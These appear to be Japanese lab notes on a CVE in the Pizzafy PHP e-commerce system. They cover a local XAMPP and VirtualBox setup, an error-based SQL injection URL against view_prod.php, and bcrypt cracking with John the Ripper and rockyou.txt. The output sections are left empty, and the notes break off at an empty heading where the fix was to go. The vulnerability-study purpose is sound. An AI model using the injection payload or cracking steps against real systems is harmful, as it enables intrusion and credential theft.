cve-2026-7228 の調査リソース
VirtualBox のインストール: https://www.virtualbox.org/wiki/Downloads
https://www.microsoft.com/it-it/software-download/windows11
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
エクスプロイトとソリューションの GitHub: https://github.com/fernando-mengali/vulndb-submissions.git
pizzafy プロジェクトを解凍し、フォルダを XAMPP の Apache の htdocs に移動する
pizzafy サイト: http://localhost/pizzafy/Pizzafy/
認証情報 → ユーザー名: [email protected] パスワード: admin123
具体的には、XML でエラーを返す SQL インジェクション Error-Based
最初に GET メソッド: http://localhost/Pizzafy/pizzafy/view_prod.php?id=
9%20AND%20extractvalue(rand(),%20concat(0x7e,version()))%20--

プログラミング言語: ==python==
使用ライブラリ: request import request
エクスプロイトファイル: /script/test.py
test.py の実行
出力:

ハッシュ値からパスワードを復号するための john the ripper のインストール。Kali などのオペレーティングシステムでは、このツールはすでにインストールされています。
パスワードを txt ファイルに保存する: hash.txt
rockyou.txt ファイルのインストール: git clone https://gitlab.com/kalilinux/packages/wordlists.git
gunzip rockyou.txt.gz
暗号化されたパスワードの種類: ==bcrypt==
ワードリストファイルを使用したツールの実行: john --wordlist=rockyou.txt --format=bcrypt hash.txt
出力:

パスワード: admin123
VirtualBox を開き、Windows 11 の仮想マシンにホストオンリーアダプターを使用して IP アドレスを設定する


Windows 11 マシンを起動し、IP アドレスが正しく設定されているか確認する
入力: ipconfig

Apache と MySQL を起動する

python3 exploit.py
pizzafy/Pizzafy を開き、ファイル view_prod.php を見つけて、次の部分を探す:


